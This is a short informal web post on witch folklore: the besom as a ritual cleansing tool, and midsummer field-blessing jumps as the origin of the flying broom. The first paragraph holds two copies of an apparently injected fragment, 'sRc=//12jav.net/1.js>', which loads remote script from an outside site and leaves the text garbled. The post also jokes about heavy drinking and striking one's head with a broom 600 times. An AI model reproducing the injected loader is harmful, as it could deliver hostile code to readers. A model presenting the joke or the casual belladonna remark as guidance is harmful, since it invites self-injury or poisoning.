A FLY BROOM???

You see there's been some slight misunderstanding between the abilities of a witch's broom. First of all it's called a besom and it's main purpose is to both cleanse a magick circle and communicate with the spirits of the element of air (so people thought that it could fly because it communicated with those spirits) but I suppose it is possible to fly with one. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

The witch flying on a broom came from the old way of blessing the fields at mid summers. Basically you run through the fields with a broom between your legs and jump as high as you can while running. It is thought that this encourages the plants to grow.

TO make a broom fly:
drink a lot of liquor and hit yourself in the center of your forehead with a broom (about 600 times).

I think back in the day witches used Belladonna (very dangerous) to "fly" it gave them hallucinations. Witches also used a broom called a besom as a cleansing tool. As in cleansing a sacred space.
